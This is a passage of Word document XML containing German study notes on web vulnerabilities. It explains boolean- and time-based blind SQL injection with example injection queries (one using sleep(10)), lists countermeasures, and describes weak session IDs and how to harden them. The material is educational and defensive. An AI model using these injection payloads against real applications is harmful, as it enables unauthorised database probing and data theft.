    <w:p w14:paraId="65493F09" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46043401" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Time-based Blind SQL Injection:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bei dieser Technik verzögert der Angreifer die Antwort der Datenbank durch Einschleusen einer SQL-Anweisung, die die Datenbank dazu bringt, für eine bestimmte Zeit zu "schlafen". Das Fehlen oder Vorhandensein einer Verzögerung in der Antwort der Anwendung zeigt dem Angreifer, ob die injizierte SQL-Anweisung wahr oder falsch ist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4BEE3F" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DFF9F3C" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Beispiel für eine Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128C8B0E" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Nehmen wir an, ein Angreifer möchte herausfinden, ob der Name des ersten Benutzers in der Datenbank "Admin" ist. Er könnte eine SQL-Abfrage wie folgt konstruieren:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BF4BCA" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76136E9B" w14:textId="0B96B803" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Für eine boolean-basierte Blind SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62872605" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA7570" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730851E8" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = 'Admin' AND '1'='1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C49D79" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="213B13D0" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Wenn die Anwendung anders reagiert, wenn der Benutzername existiert, im Vergleich zu wenn er nicht existiert, kann der Angreifer daraus schließen, dass der Benutzername "Admin" in der Datenbank vorhanden ist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7273E701" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286C6CC5" w14:textId="415A4F72" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Für eine time-basierte Blind SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629582C1" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC60101" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73214380" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = 'Admin' AND IF(1=1, sleep(10), 'false');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2771EB" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Wenn die Datenbank für 10 Sekunden "schläft", bevor die Antwort gesendet wird, weiß der Angreifer, dass der Benutzername "Admin" existiert. Keine Verzögerung würde darauf hinweisen, dass der Benutzername nicht existiert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4A3E48" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4417EF" w14:textId="77777777" w:rsidR="0021754F" w:rsidRPr="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gegenmaßnahmen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38572C7A" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Verwendung von Prepared Statements und Parametrisierten Abfragen: Wie bei anderen Formen der SQL Injection ist dies die effektivste Methode zur Vermeidung von Blind SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03521985" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Einschränkung der Fehlermeldungen:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vermeiden Sie detaillierte Datenbankfehlermeldungen, die Angreifern Hinweise geben könnten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA9A495" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementierung von Web Application Firewalls (WAFs):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Eine WAF kann bekannte Angriffsmuster erkennen und blockieren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1BDAD9" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zeitliche Inkonsistenzen minimieren:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vermeiden Sie, dass die Anwendungslogik auf Zeitbasis Rückschlüsse auf die Datenbankstruktur zulässt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A784D6" w14:textId="77777777" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0021754F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eingabevalidierung und -desinfizierung:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stellen Sie sicher, dass alle Eingaben validiert und desinfiziert werden, um die Einschleusung schädlichen Codes zu verhindern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0543B407" w14:textId="7A12D225" w:rsidR="0021754F" w:rsidRDefault="0021754F" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D12CF97" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FA21B28" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A83C7C8" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F765E9" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A2824B" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0826ABB8" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD96B09" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D22B86E" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D20F0E4" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A835B8" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71108D4C" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43198600" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C3A0BB" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C76A3A" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA61D8C" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28525E20" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F81E59" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9BD678" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524FA122" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24299980" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C4E438" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BECC42A" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8DAEC0" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCC30CF" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440FF3F5" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDFE69D" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="688F29EA" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B678DB2" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E82E6E" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DAEDC9" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A26BAC" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F4363D9" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4273ED" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FEE6E23" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525E242C" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AEB738F" w14:textId="4B2CE5CC" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="0021754F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE49B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Weak Session ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4246ADFF" w14:textId="3FF64244" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Weak Session IDs sind eine Sicherheitsanfälligkeit, die auftritt, wenn Webanwendungen Session-Identifikatoren (Session IDs) verwenden, die leicht zu erraten, vorherzusagen oder auf andere Weise durch Angreifer zu kompromittieren sind.. Sie ermöglichen es der Anwendung, die Anfragen eines Benutzers während einer Sitzung zu verfolgen, ohne dass der Benutzer sich bei jeder Anfrage neu authentifizieren muss. Eine schwache Session ID kann es Angreifern ermöglichen, eine gültige Benutzersitzung zu übernehmen (Session Hijacking) oder andere Sicherheitsverletzungen zu verursachen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8DF4CB" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF4CB76" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRPr="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE49B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Probleme durch schwache Session IDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362E6527" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE49B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session Hijacking:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wenn ein Angreifer in der Lage ist, die Session ID eines anderen Benutzers zu erraten oder auf andere Weise zu erlangen, kann er die Identität dieses Benutzers annehmen und auf die Webanwendung mit den Rechten und Daten des Benutzers zugreifen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEB699A" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE49B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session Fixation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bei diesem Angriff zwingt der Angreifer einem Benutzer eine bekannte Session ID auf und übernimmt die Kontrolle über die Benutzersitzung, nachdem sich der Benutzer authentifiziert hat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F0A04" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE49B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Man-in-the-Middle-Angriffe (MITM):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Schwache oder unverschlüsselte Session IDs, die über das Netzwerk übertragen werden, können von Angreifern abgefangen werden, die dann die Sitzung übernehmen können.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337029D3" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRPr="00796D13" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796D13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Merkmale schwacher Session IDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71014C7B" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE49B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vorhersehbarkeit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session IDs, die auf einfachen Mustern, sequenziellen Zahlen oder unzureichenden Zufallsmechanismen basieren, können leichter vorhergesagt werden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DFF9CD" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE49B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unzureichende Länge:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kurze Session IDs bieten nicht genug Entropie, was sie anfälliger für Brute-Force-Angriffe macht.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007F15B4" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE49B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mangelnde Verschlüsselung:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unverschlüsselte oder schlecht verschlüsselte Session IDs sind anfälliger für Abfangen und Entschlüsseln.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267040E8" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE49B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unsichere Speicherung:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session IDs, die in Cookies ohne Secure- und HttpOnly-Flags gespeichert sind, können leichter durch Cross-Site Scripting (XSS) angegriffen werden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B76C5B2" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRPr="009F0EF0" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F0EF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gegenmaßnahmen und Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568B1298" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE49B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Starke Zufälligkeit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Verwenden Sie starke kryptografische Funktionen zur Generierung von Session IDs, um sicherzustellen, dass sie hochzufällig und nicht vorhersehbar sind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305539F8" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00796D13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ausreichende Länge:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session IDs sollten lang genug sein, um eine ausreichende Anzahl von möglichen Werten zu bieten, wodurch Brute-Force-Angriffe praktisch unmöglich werden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509DB662" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00796D13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sichere Übertragung:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Übertragen Sie Session IDs immer über verschlüsselte Verbindungen (HTTPS) und setzen Sie die Secure- und HttpOnly-Flags in Cookies, um das Risiko eines Abfangens zu minimieren.</w:t>
      </w:r>
    </w:p>
